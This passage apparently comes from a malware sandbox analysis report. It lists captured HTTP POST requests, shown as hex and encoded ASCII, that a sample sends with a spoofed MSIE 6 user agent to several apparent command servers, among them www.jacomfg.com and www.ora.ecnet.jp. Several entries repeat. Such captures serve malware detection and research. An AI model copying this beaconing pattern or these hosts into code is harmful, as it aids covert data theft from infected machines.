30 38 36 64 51 52 59 30 48 6b 32 68 75 67 68 65 47 4f 36 72 63 74 74 35 38 4f 4d 63 4e 55 50 44 47 30 31 7a 6f 72 4c 6e 43 2b 72 6b 4b 67 36 73 50 5a 68 30 42 6b 35 63 76 71 37 68 61 49 59 54 5a 70 65 49 64 43 73 34 6f 6b 4c 39 72 65 43 63 4c 6f 46 2f 39 32 5a 58 43 49 4f 6f 36 38 5a 31 64 4a 49 35 32 7a 72 67 41 79 5a 56 45 72 36 30 67 69 4f 36 63 4b 62 6d 66 50 42 43 62 55 6b 33 62 6d 71 38 73 2b 50 4b 34 35 30 45 69 49 63 59 44 61 48 45 59 2f 79 31 65 39 63 6f 4d 48 51 53 51 37 57 5a 62 4f 72 36 43 44 62 6b 30 3d Data Ascii: 8qyyJjtxIYfI47wH0jUCeyQf/ZJBRINlnxb5+WyBWBywbrrodhjlARZod8x3xnR7HRyDOS8iUUjKOD/uAdOaxca58VNt3MFhR+0oRQp8Ya6o7JhOO+4H4FUQUq7ZTMYGWVVrx9qcdt8Uunxh/nBIU3WNtnckEKr1+1Vr1HGXiZKc8OStrmxnHD8wURpgo3xu1NP9LDBFa1SCx+HDAf6o+tlMbz8+1JR6Q24ixTv+U9/y70Br1kZN4wRR24728oplQvSu/otxtF5LxLXRWE2V9FO3LlwcHM8JoJcZVL0Lt6fjpuYKfXhWCr4+DK6jkV7XyxL8h0kIBFNfno+ioE2yC3mDwolB3y4+ZIQnkRyd38YWml9vC2eH0cHKU5IxxmoTaV086dQRY0Hk2hugheGO6rctt58OMcNUPDG01zorLnC+rkKg6sPZh0Bk5cvq7haIYTZpeIdCs4okL9reCcLoF/92ZXCIOo68Z1dJI52zrgAyZVEr60giO6cKbmfPBCbUk3bmq8s+PK450EiIcYDaHEY/y1e9coMHQSQ7WZbOr6CDbk0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 47 7a 65 4f 39 7a 2f 57 73 34 5a 39 62 49 65 50 48 75 34 55 70 38 67 2b 7a 31 75 56 64 38 35 6e 34 79 48 76 74 34 78 49 57 7a 50 71 4d 6f 75 31 59 58 49 77 45 46 67 35 4d 59 4e 4c 2b 47 5a 7a 47 70 34 35 4d 36 38 49 35 74 45 6a 72 2f 6b 45 4f 63 74 36 50 48 57 67 78 2f 78 71 49 56 52 75 69 4f 39 63 65 4d 55 41 70 66 67 4b 48 75 43 36 76 6a 52 76 57 74 45 2f 70 4a 46 45 4b 43 53 72 31 72 6e 57 6f 75 41 6d 59 78 64 49 78 50 78 41 76 6d 6c 4a 6e 78 4d 7a 57 34 76 7a 63 63 58 51 48 48 64 78 78 36 65 6b 74 5a 75 5a 32 39 77 63 73 30 49 62 51 66 2f 62 6c 66 57 5a 6d 62 52 4e 4c 2b 55 6b 78 35 2f 35 67 4e 66 69 65 38 79 5a 72 6c 75 31 44 76 55 72 48 55 55 54 70 54 45 35 73 72 39 6f 56 54 70 69 33 47 35 2b 36 39 79 43 44 65 4c 70 42 59 47 43 6d 4c 4f 45 73 44 66 37 75 79 6f 45 6c 61 70 36 47 6c 58 30 6e 51 6f 62 6f 6e 54 37 43 61 34 79 5a 4f 48 47 2b 6f 68 31 5a 75 76 4a 72 7a 39 49 58 34 7a 79 71 35 49 65 63 56 4e 44 62 43 51 49 50 62 36 44 45 46 4d 64 6e 36 30 31 43 57 64 4d 39 33 53 5a 48 56 77 68 62 75 39 51 69 42 34 6f 50 45 38 63 66 67 55 38 57 34 2b 71 66 58 6a 4d 6c 4c 37 52 4f 4d 75 74 6d 68 2b 61 4e 62 69 44 59 67 74 4a 2b 4e 4d 65 62 7a 55 44 36 4d 32 31 62 6a 71 48 51 54 45 79 36 57 59 67 6b 2f 37 66 51 79 61 4e 36 39 31 54 7a 6f 59 6d 33 70 36 6b 44 32 6a 43 76 42 62 79 38 43 57 4b 48 34 4e 41 36 78 30 70 39 7a 67 50 49 54 66 6b 38 78 49 61 79 55 76 54 31 78 6a 2b 2b 67 4c 73 2f 4b 33 58 44 6b 43 4d 4f 39 52 6a 30 70 6a 46 59 4a 6f 59 62 44 72 6b 6b 70 6d 47 67 6a 44 6e 56 70 54 33 70 74 31 50 6e 74 43 6b 65 63 35 44 68 2b 6f 4f 68 2f 34 76 41 69 54 57 4e 50 4d 74 50 43 66 4e 57 34 7a 31 6a 31 57 45 61 51 42 72 76 6a 4d 6d 65 61 6b 46 70 32 62 53 62 47 43 30 4d 32 41 6f 75 38 4b 66 64 67 2f 67 2f 50 72 72 4c 2f 6d 51 61 46 59 3d Data Ascii: GzeO9z/Ws4Z9bIePHu4Up8g+z1uVd85n4yHvt4xIWzPqMou1YXIwEFg5MYNL+GZzGp45M68I5tEjr/kEOct6PHWgx/xqIVRuiO9ceMUApfgKHuC6vjRvWtE/pJFEKCSr1rnWouAmYxdIxPxAvmlJnxMzW4vzccXQHHdxx6ektZuZ29wcs0IbQf/blfWZmbRNL+Ukx5/5gNfie8yZrlu1DvUrHUUTpTE5sr9oVTpi3G5+69yCDeLpBYGCmLOEsDf7uyoElap6GlX0nQobonT7Ca4yZOHG+oh1ZuvJrz9IX4zyq5IecVNDbCQIPb6DEFMdn601CWdM93SZHVwhbu9QiB4oPE8cfgU8W4+qfXjMlL7ROMutmh+aNbiDYgtJ+NMebzUD6M21bjqHQTEy6WYgk/7fQyaN691TzoYm3p6kD2jCvBby8CWKH4NA6x0p9zgPITfk8xIayUvT1xj++gLs/K3XDkCMO9Rj0pjFYJoYbDrkkpmGgjDnVpT3pt1PntCkec5Dh+oOh/4vAiTWNPMtPCfNW4z1j1WEaQBrvjMmeakFp2bSbGC0M2Aou8Kfdg/g/PrrL/mQaFY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 36 54 32 43 43 42 71 6b 31 59 61 33 51 68 37 37 50 61 51 30 4f 31 33 55 41 6b 30 4b 46 76 67 31 37 68 39 59 53 37 2f 78 69 4f 36 49 76 6d 64 5a 72 6c 62 38 30 65 6e 6d 7a 73 48 55 55 51 37 78 6a 73 51 75 6f 50 6a 4f 70 42 32 75 35 75 44 6e 6b 34 6e 4c 43 5a 54 4f 68 71 4e 49 55 6b 4c 69 41 45 5a 50 70 65 55 2f 64 74 6b 71 4f 42 64 49 62 4a 50 6a 57 70 35 53 31 6a 54 53 5a 32 42 38 44 71 37 4b 39 6b 6b 74 63 49 5a 54 45 77 5a 4d 6a 62 6f 6f 78 4f 66 74 36 4d 6c 55 38 2b 2f 4e 30 70 41 67 34 6c 69 59 41 55 59 6d 7a 50 65 42 53 39 35 61 46 58 79 73 2b 41 47 4a 72 76 6b 2b 30 6a 7a 54 69 63 48 72 6d 69 72 56 6e 48 79 32 38 73 58 57 59 30 52 30 42 6b 55 37 33 54 75 4f 2b 44 38 46 76 4f 47 6c 44 39 57 54 6b 38 49 48 79 4e 65 68 4c 39 31 4f 42 78 75 78 4c 49 41 61 78 6c 66 59 30 6f 48 59 46 77 32 5a 2f 74 2b 69 46 61 33 79 52 30 58 4f 34 70 36 67 69 55 38 76 36 6f 72 68 64 31 6f 69 77 43 6a 63 5a 52 4a 46 44 50 59 6e 4f 42 49 5a 2b 35 4c 48 67 63 31 54 61 78 75 5a 62 58 55 4c 51 72 33 63 2b 57 54 54 74 39 6c 67 33 69 41 53 4b 6b 43 42 4d 74 61 62 78 44 75 75 2b 41 64 2f 4e 49 70 6b 46 4e 67 68 59 70 37 6c 46 75 59 66 34 51 73 31 68 59 62 47 74 5a 59 36 55 7a 35 37 2b 63 74 4d 73 4f 5a 59 6f 67 44 43 2f 47 41 53 2b 35 59 45 2f 69 70 6d 6a 46 54 4b 6b 4b 75 36 2b 4f 61 79 38 4a 38 66 56 70 6d 39 35 31 31 52 66 68 72 48 6b 75 63 34 77 42 41 66 75 4a 66 69 5a 70 5a 44 48 70 71 59 35 33 31 76 4d 46 77 53 45 53 39 6e 53 4d 44 43 31 39 51 31 34 30 65 70 5a 75 53 69 71 36 37 75 4a 4e 2f 4e 76 62 54 67 56 62 56 52 32 35 78 30 43 73 4f 4d 33 6b 6b 36 70 39 43 31 52 61 31 74 53 78 42 79 6a 68 67 5a 54 34 34 70 37 31 74 5a 38 4c 48 44 6c 57 66 37 58 4d 7a 4a 68 56 58 64 4c 4d 4e 47 47 63 6b 30 6f 4d 34 43 70 77 4d 54 33 44 4a 39 34 77 4d 61 79 79 47 52 31 6c 7a 64 64 41 3d 3d Data Ascii: 6T2CCBqk1Ya3Qh77PaQ0O13UAk0KFvg17h9YS7/xiO6IvmdZrlb80enmzsHUUQ7xjsQuoPjOpB2u5uDnk4nLCZTOhqNIUkLiAEZPpeU/dtkqOBdIbJPjWp5S1jTSZ2B8Dq7K9kktcIZTEwZMjbooxOft6MlU8+/N0pAg4liYAUYmzPeBS95aFXys+AGJrvk+0jzTicHrmirVnHy28sXWY0R0BkU73TuO+D8FvOGlD9WTk8IHyNehL91OBxuxLIAaxlfY0oHYFw2Z/t+iFa3yR0XO4p6giU8v6orhd1oiwCjcZRJFDPYnOBIZ+5LHgc1TaxuZbXULQr3c+WTTt9lg3iASKkCBMtabxDuu+Ad/NIpkFNghYp7lFuYf4Qs1hYbGtZY6Uz57+ctMsOZYogDC/GAS+5YE/ipmjFTKkKu6+Oay8J8fVpm9511RfhrHkuc4wBAfuJfiZpZDHpqY531vMFwSES9nSMDC19Q140epZuSiq67uJN/NvbTgVbVR25x0CsOM3kk6p9C1Ra1tSxByjhgZT44p71tZ8LHDlWf7XMzJhVXdLMNGGck0oM4CpwMT3DJ94wMayyGR1lzddA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 73 6f 78 4f 59 58 74 59 49 34 66 50 2f 7a 33 64 45 6e 4e 2b 30 6d 54 45 57 5a 6d 42 4c 4f 63 71 33 38 6e 34 50 33 55 33 32 4b 4e 69 32 76 4c 78 55 70 2f 53 55 52 58 35 61 2f 50 38 71 50 5a 33 62 32 37 33 2f 51 48 2f 48 52 61 71 78 78 30 4f 67 59 2b 49 77 34 48 46 41 6d 6b 76 30 78 4b 66 4f 46 75 53 66 43 79 35 4e 55 72 39 5a 48 56 46 6c 7a 59 4a 76 79 72 38 2b 6f 57 70 6c 6f 62 4f 76 2b 38 6c 6e 34 53 70 70 2f 2f 45 45 4e 43 71 50 61 5a 41 4a 4c 4e 45 32 61 78 50 78 33 56 38 2f 43 4a 4c 38 65 42 47 6b 34 6f 42 64 5a 30 51 39 50 30 6f 37 66 74 66 6b 2b 61 73 4d 4e 69 41 76 69 6c 43 4c 62 31 63 4d 39 66 2b 68 37 43 46 66 70 43 4f 54 55 32 44 72 70 70 50 56 59 42 35 5a 51 42 4f 2b 2f 4a 7a 7a 36 6b 59 6a 73 34 6c 2b 48 65 37 41 33 75 58 78 6c 47 78 71 6f 39 51 4d 6b 35 55 66 6d 31 4c 6b 31 48 33 6d 76 48 51 36 58 6b 39 76 67 54 54 4a 65 6b 6f 63 4e 50 39 66 41 44 36 65 50 54 46 4f 75 67 6c 5a 64 4d 33 38 4c 36 53 33 67 61 2b 56 4b 4b 57 75 5a 2b 64 43 43 65 41 4b 4d 45 42 74 78 66 45 41 36 71 66 74 57 53 63 59 7a 4e 68 67 38 58 4e 67 6b 52 66 53 2b 76 54 63 4d 4c 59 4a 6d 51 41 6c 69 65 79 48 6e 34 35 45 69 42 6b 57 6c 34 41 65 73 56 6e 5a 4f 30 66 6a 32 6c 4f 79 74 57 6e 54 4f 6c 62 57 5a 4a 6c 4f 79 30 79 6e 6c 70 34 49 78 47 6a 48 6a 35 6f 79 42 6f 39 6b 6b 43 70 50 68 30 49 56 67 36 38 64 2f 46 69 44 49 41 4d 45 76 2b 73 6c 31 32 36 75 74 73 4b 33 32 5a 71 59 64 7a 42 72 34 49 50 6c 5a 73 44 67 54 48 6b 63 53 37 47 71 72 63 6a 31 65 73 53 7a 43 4b 71 54 39 67 4f 39 37 64 43 61 69 74 71 33 33 33 6a 49 34 51 76 78 32 4b 69 59 39 6e 38 4f 76 5a 78 35 4b 31 30 5a 75 45 2f 6b 4d 65 6f 45 48 43 6c 39 66 50 42 33 2b 2f 6f 31 2b 31 4a 45 61 52 31 4b 70 74 35 57 43 2f 33 6f 4d 71 32 46 42 54 39 39 71 68 74 62 41 49 41 68 61 2f 58 38 76 74 47 64 76 4d 51 Data Ascii: soxOYXtYI4fP/z3dEnN+0mTEWZmBLOcq38n4P3U32KNi2vLxUp/SURX5a/P8qPZ3b273/QH/HRaqxx0OgY+Iw4HFAmkv0xKfOFuSfCy5NUr9ZHVFlzYJvyr8+oWplobOv+8ln4Spp//EENCqPaZAJLNE2axPx3V8/CJL8eBGk4oBdZ0Q9P0o7ftfk+asMNiAvilCLb1cM9f+h7CFfpCOTU2DrppPVYB5ZQBO+/Jzz6kYjs4l+He7A3uXxlGxqo9QMk5Ufm1Lk1H3mvHQ6Xk9vgTTJekocNP9fAD6ePTFOuglZdM38L6S3ga+VKKWuZ+dCCeAKMEBtxfEA6qftWScYzNhg8XNgkRfS+vTcMLYJmQAlieyHn45EiBkWl4AesVnZO0fj2lOytWnTOlbWZJlOy0ynlp4IxGjHj5oyBo9kkCpPh0IVg68d/FiDIAMEv+sl126utsK32ZqYdzBr4IPlZsDgTHkcS7Gqrcj1esSzCKqT9gO97dCaitq333jI4Qvx2KiY9n8OvZx5K10ZuE/kMeoEHCl9fPB3+/o1+1JEaR1Kpt5WC/3oMq2FBT99qhtbAIAha/X8vtGdvMQ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 38 71 79 79 4a 6a 74 78 49 59 66 49 34 37 77 48 30 6a 55 43 65 79 51 66 2f 5a 4a 42 52 49 4e 6c 6e 78 62 35 2b 57 79 42 57 42 79 77 62 72 72 6f 64 68 6a 6c 41 52 5a 6f 64 38 78 33 78 6e 52 37 48 52 79 44 4f 53 38 69 55 55 6a 4b 4f 44 2f 75 41 64 4f 61 78 63 61 35 38 56 4e 74 33 4d 46 68 52 2b 30 6f 52 51 70 38 59 61 36 6f 37 4a 68 4f 4f 2b 34 48 34 46 55 51 55 71 37 5a 54 4d 59 47 57 56 56 72 78 39 71 63 64 74 38 55 75 6e 78 68 2f 6e 42 49 55 33 57 4e 74 6e 63 6b 45 4b 72 31 2b 31 56 72 31 48 47 58 69 5a 4b 63 38 4f 53 74 72 6d 78 6e 48 44 38 77 55 52 70 67 6f 33 78 75 31 4e 50 39 4c 44 42 46 61 31 53 43 78 2b 48 44 41 66 36 6f 2b 74 6c 4d 62 7a 38 2b 31 4a 52 36 51 32 34 69 78 54 76 2b 55 39 2f 79 37 30 42 72 31 6b 5a 4e 34 77 52 52 32 34 37 32 38 6f 70 6c 51 76 53 75 2f 6f 74 78 74 46 35 4c 78 4c 58 52 57 45 32 56 39 46 4f 33 4c 6c 77 63 48 4d 38 4a 6f 4a 63 5a 56 4c 30 4c 74 36 66 6a 70 75 59 4b 66 58 68 57 43 72 34 2b 44 4b 36 6a 6b 56 37 58 79 78 4c 38 68 30 6b 49 42 46 4e 66 6e 6f 2b 69 6f 45 32 79 43 33 6d 44 77 6f 6c 42 33 79 34 2b 5a 49 51 6e 6b 52 79 64 33 38 59 57 6d 6c 39 76 43 32 65 48 30 63 48 4b 55 35 49 78 78 6d 6f 54 61 56 30 38 36 64 51 52 59 30 48 6b 32 68 75 67 68 65 47 4f 36 72 63 74 74 35 38 4f 4d 63 4e 55 50 44 47 30 31 7a 6f 72 4c 6e 43 2b 72 6b 4b 67 36 73 50 5a 68 30 42 6b 35 63 76 71 37 68 61 49 59 54 5a 70 65 49 64 43 73 34 6f 6b 4c 39 72 65 43 63 4c 6f 46 2f 39 32 5a 58 43 49 4f 6f 36 38 5a 31 64 4a 49 35 32 7a 72 67 41 79 5a 56 45 72 36 30 67 69 4f 36 63 4b 62 6d 66 50 42 43 62 55 6b 33 62 6d 71 38 73 2b 50 4b 34 35 30 45 69 49 63 59 44 61 48 45 59 2f 79 31 65 39 63 6f 4d 48 51 53 51 37 57 5a 62 4f 72 36 43 44 62 6b 30 3d Data Ascii: 8qyyJjtxIYfI47wH0jUCeyQf/ZJBRINlnxb5+WyBWBywbrrodhjlARZod8x3xnR7HRyDOS8iUUjKOD/uAdOaxca58VNt3MFhR+0oRQp8Ya6o7JhOO+4H4FUQUq7ZTMYGWVVrx9qcdt8Uunxh/nBIU3WNtnckEKr1+1Vr1HGXiZKc8OStrmxnHD8wURpgo3xu1NP9LDBFa1SCx+HDAf6o+tlMbz8+1JR6Q24ixTv+U9/y70Br1kZN4wRR24728oplQvSu/otxtF5LxLXRWE2V9FO3LlwcHM8JoJcZVL0Lt6fjpuYKfXhWCr4+DK6jkV7XyxL8h0kIBFNfno+ioE2yC3mDwolB3y4+ZIQnkRyd38YWml9vC2eH0cHKU5IxxmoTaV086dQRY0Hk2hugheGO6rctt58OMcNUPDG01zorLnC+rkKg6sPZh0Bk5cvq7haIYTZpeIdCs4okL9reCcLoF/92ZXCIOo68Z1dJI52zrgAyZVEr60giO6cKbmfPBCbUk3bmq8s+PK450EiIcYDaHEY/y1e9coMHQSQ7WZbOr6CDbk0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 73 6f 78 4f 59 58 74 59 49 34 66 50 2f 7a 33 64 45 6e 4e 2b 30 6d 54 45 57 5a 6d 42 4c 4f 63 71 33 38 6e 34 50 33 55 33 32 4b 4e 69 32 76 4c 78 55 70 2f 53 55 52 58 35 61 2f 50 38 71 50 5a 33 62 32 37 33 2f 51 48 2f 48 52 61 71 78 78 30 4f 67 59 2b 49 77 34 48 46 41 6d 6b 76 30 78 4b 66 4f 46 75 53 66 43 79 35 4e 55 72 39 5a 48 56 46 6c 7a 59 4a 76 79 72 38 2b 6f 57 70 6c 6f 62 4f 76 2b 38 6c 6e 34 53 70 70 2f 2f 45 45 4e 43 71 50 61 5a 41 4a 4c 4e 45 32 61 78 50 78 33 56 38 2f 43 4a 4c 38 65 42 47 6b 34 6f 42 64 5a 30 51 39 50 30 6f 37 66 74 66 6b 2b 61 73 4d 4e 69 41 76 69 6c 43 4c 62 31 63 4d 39 66 2b 68 37 43 46 66 70 43 4f 54 55 32 44 72 70 70 50 56 59 42 35 5a 51 42 4f 2b 2f 4a 7a 7a 36 6b 59 6a 73 34 6c 2b 48 65 37 41 33 75 58 78 6c 47 78 71 6f 39 51 4d 6b 35 55 66 6d 31 4c 6b 31 48 33 6d 76 48 51 36 58 6b 39 76 67 54 54 4a 65 6b 6f 63 4e 50 39 66 41 44 36 65 50 54 46 4f 75 67 6c 5a 64 4d 33 38 4c 36 53 33 67 61 2b 56 4b 4b 57 75 5a 2b 64 43 43 65 41 4b 4d 45 42 74 78 66 45 41 36 71 66 74 57 53 63 59 7a 4e 68 67 38 58 4e 67 6b 52 66 53 2b 76 54 63 4d 4c 59 4a 6d 51 41 6c 69 65 79 48 6e 34 35 45 69 42 6b 57 6c 34 41 65 73 56 6e 5a 4f 30 66 6a 32 6c 4f 79 74 57 6e 54 4f 6c 62 57 5a 4a 6c 4f 79 30 79 6e 6c 70 34 49 78 47 6a 48 6a 35 6f 79 42 6f 39 6b 6b 43 70 50 68 30 49 56 67 36 38 64 2f 46 69 44 49 41 4d 45 76 2b 73 6c 31 32 36 75 74 73 4b 33 32 5a 71 59 64 7a 42 72 34 49 50 6c 5a 73 44 67 54 48 6b 63 53 37 47 71 72 63 6a 31 65 73 53 7a 43 4b 71 54 39 67 4f 39 37 64 43 61 69 74 71 33 33 33 6a 49 34 51 76 78 32 4b 69 59 39 6e 38 4f 76 5a 78 35 4b 31 30 5a 75 45 2f 6b 4d 65 6f 45 48 43 6c 39 66 50 42 33 2b 2f 6f 31 2b 31 4a 45 61 52 31 4b 70 74 35 57 43 2f 33 6f 4d 71 32 46 42 54 39 39 71 68 74 62 41 49 41 68 61 2f 58 38 76 74 47 64 76 4d 51 Data Ascii: soxOYXtYI4fP/z3dEnN+0mTEWZmBLOcq38n4P3U32KNi2vLxUp/SURX5a/P8qPZ3b273/QH/HRaqxx0OgY+Iw4HFAmkv0xKfOFuSfCy5NUr9ZHVFlzYJvyr8+oWplobOv+8ln4Spp//EENCqPaZAJLNE2axPx3V8/CJL8eBGk4oBdZ0Q9P0o7ftfk+asMNiAvilCLb1cM9f+h7CFfpCOTU2DrppPVYB5ZQBO+/Jzz6kYjs4l+He7A3uXxlGxqo9QMk5Ufm1Lk1H3mvHQ6Xk9vgTTJekocNP9fAD6ePTFOuglZdM38L6S3ga+VKKWuZ+dCCeAKMEBtxfEA6qftWScYzNhg8XNgkRfS+vTcMLYJmQAlieyHn45EiBkWl4AesVnZO0fj2lOytWnTOlbWZJlOy0ynlp4IxGjHj5oyBo9kkCpPh0IVg68d/FiDIAMEv+sl126utsK32ZqYdzBr4IPlZsDgTHkcS7Gqrcj1esSzCKqT9gO97dCaitq333jI4Qvx2KiY9n8OvZx5K10ZuE/kMeoEHCl9fPB3+/o1+1JEaR1Kpt5WC/3oMq2FBT99qhtbAIAha/X8vtGdvMQ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 47 7a 65 4f 39 7a 2f 57 73 34 5a 39 62 49 65 50 48 75 34 55 70 38 67 2b 7a 31 75 56 64 38 35 6e 34 79 48 76 74 34 78 49 57 7a 50 71 4d 6f 75 31 59 58 49 77 45 46 67 35 4d 59 4e 4c 2b 47 5a 7a 47 70 34 35 4d 36 38 49 35 74 45 6a 72 2f 6b 45 4f 63 74 36 50 48 57 67 78 2f 78 71 49 56 52 75 69 4f 39 63 65 4d 55 41 70 66 67 4b 48 75 43 36 76 6a 52 76 57 74 45 2f 70 4a 46 45 4b 43 53 72 31 72 6e 57 6f 75 41 6d 59 78 64 49 78 50 78 41 76 6d 6c 4a 6e 78 4d 7a 57 34 76 7a 63 63 58 51 48 48 64 78 78 36 65 6b 74 5a 75 5a 32 39 77 63 73 30 49 62 51 66 2f 62 6c 66 57 5a 6d 62 52 4e 4c 2b 55 6b 78 35 2f 35 67 4e 66 69 65 38 79 5a 72 6c 75 31 44 76 55 72 48 55 55 54 70 54 45 35 73 72 39 6f 56 54 70 69 33 47 35 2b 36 39 79 43 44 65 4c 70 42 59 47 43 6d 4c 4f 45 73 44 66 37 75 79 6f 45 6c 61 70 36 47 6c 58 30 6e 51 6f 62 6f 6e 54 37 43 61 34 79 5a 4f 48 47 2b 6f 68 31 5a 75 76 4a 72 7a 39 49 58 34 7a 79 71 35 49 65 63 56 4e 44 62 43 51 49 50 62 36 44 45 46 4d 64 6e 36 30 31 43 57 64 4d 39 33 53 5a 48 56 77 68 62 75 39 51 69 42 34 6f 50 45 38 63 66 67 55 38 57 34 2b 71 66 58 6a 4d 6c 4c 37 52 4f 4d 75 74 6d 68 2b 61 4e 62 69 44 59 67 74 4a 2b 4e 4d 65 62 7a 55 44 36 4d 32 31 62 6a 71 48 51 54 45 79 36 57 59 67 6b 2f 37 66 51 79 61 4e 36 39 31 54 7a 6f 59 6d 33 70 36 6b 44 32 6a 43 76 42 62 79 38 43 57 4b 48 34 4e 41 36 78 30 70 39 7a 67 50 49 54 66 6b 38 78 49 61 79 55 76 54 31 78 6a 2b 2b 67 4c 73 2f 4b 33 58 44 6b 43 4d 4f 39 52 6a 30 70 6a 46 59 4a 6f 59 62 44 72 6b 6b 70 6d 47 67 6a 44 6e 56 70 54 33 70 74 31 50 6e 74 43 6b 65 63 35 44 68 2b 6f 4f 68 2f 34 76 41 69 54 57 4e 50 4d 74 50 43 66 4e 57 34 7a 31 6a 31 57 45 61 51 42 72 76 6a 4d 6d 65 61 6b 46 70 32 62 53 62 47 43 30 4d 32 41 6f 75 38 4b 66 64 67 2f 67 2f 50 72 72 4c 2f 6d 51 61 46 59 3d Data Ascii: GzeO9z/Ws4Z9bIePHu4Up8g+z1uVd85n4yHvt4xIWzPqMou1YXIwEFg5MYNL+GZzGp45M68I5tEjr/kEOct6PHWgx/xqIVRuiO9ceMUApfgKHuC6vjRvWtE/pJFEKCSr1rnWouAmYxdIxPxAvmlJnxMzW4vzccXQHHdxx6ektZuZ29wcs0IbQf/blfWZmbRNL+Ukx5/5gNfie8yZrlu1DvUrHUUTpTE5sr9oVTpi3G5+69yCDeLpBYGCmLOEsDf7uyoElap6GlX0nQobonT7Ca4yZOHG+oh1ZuvJrz9IX4zyq5IecVNDbCQIPb6DEFMdn601CWdM93SZHVwhbu9QiB4oPE8cfgU8W4+qfXjMlL7ROMutmh+aNbiDYgtJ+NMebzUD6M21bjqHQTEy6WYgk/7fQyaN691TzoYm3p6kD2jCvBby8CWKH4NA6x0p9zgPITfk8xIayUvT1xj++gLs/K3XDkCMO9Rj0pjFYJoYbDrkkpmGgjDnVpT3pt1PntCkec5Dh+oOh/4vAiTWNPMtPCfNW4z1j1WEaQBrvjMmeakFp2bSbGC0M2Aou8Kfdg/g/PrrL/mQaFY=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 36 66 33 4b 54 58 34 47 4b 34 64 49 75 56 39 77 53 58 75 43 34 47 47 34 6e 4c 59 2b 77 67 59 6f 6b 68 62 42 6a 4c 50 38 49 63 44 4a 79 55 63 49 6e 58 51 76 76 68 41 31 6a 75 4f 74 63 39 77 51 65 36 6e 43 4d 30 64 62 57 33 53 6d 35 43 2f 2b 2f 78 68 57 51 43 67 41 72 75 4e 71 39 38 32 68 5a 4d 5a 30 75 30 72 45 38 54 74 64 6a 44 6b 79 77 39 4b 47 2b 53 73 65 42 7a 4f 67 46 50 4e 38 4b 67 55 53 36 5a 6e 37 35 35 58 42 33 62 65 4b 50 68 7a 69 51 79 41 33 31 36 5a 72 2f 54 44 5a 6e 51 6b 53 38 74 38 57 54 31 6f 63 41 70 64 55 30 50 71 49 58 2f 4a 76 65 65 79 64 37 47 31 6a 38 79 6a 44 4a 77 75 5a 63 45 32 4c 4d 53 73 58 37 46 2f 70 71 48 78 2b 4d 5a 53 65 4a 49 57 4a 61 63 62 71 4e 39 4d 61 7a 74 54 37 71 30 45 61 51 35 47 46 6f 58 48 4c 6e 68 35 6c 76 53 76 31 41 31 66 70 43 4a 44 6d 68 2b 74 48 43 38 68 54 43 6e 48 46 70 48 63 2b 66 4b 33 6c 52 70 74 66 6b 68 57 71 71 76 45 59 59 4b 66 6b 54 56 6e 77 36 52 4d 37 75 4c 4b 53 2f 70 4d 43 4c 70 42 58 53 42 49 63 66 6b 72 64 72 6c 7a 72 6a 56 41 50 6a 36 4b 76 4e 50 61 6c 4e 53 33 4e 76 36 7a 58 6c 4b 57 6f 77 48 73 6a 78 72 66 52 6f 67 58 73 68 76 46 34 76 75 2f 5a 6a 41 55 42 42 41 75 57 69 62 6c 68 53 58 33 31 37 42 75 75 4b 41 4a 70 71 78 78 6e 39 2f 47 39 56 7a 61 4d 61 52 31 4b 49 6c 5a 5a 78 41 67 65 33 76 39 31 68 4d 4a 6d 4c 4e 6c 72 36 54 78 4f 4a 38 6c 32 6f 69 65 55 50 77 79 39 45 73 44 76 2f 52 38 30 4b 64 38 6c 6d 45 51 66 77 55 71 42 47 39 62 53 5a 57 43 75 6f 66 33 55 67 59 37 34 39 59 61 69 53 74 6b 72 41 4e 2f 77 50 43 55 6e 5a 45 38 58 79 39 68 2f 59 70 37 49 49 6a 65 72 56 51 68 62 4b 4d 69 36 52 2b 4c 47 4d 4d 6e 4d 74 65 6c 39 59 39 6c 63 65 51 69 31 61 64 51 36 2f 70 43 54 42 41 3d 3d Data Ascii: 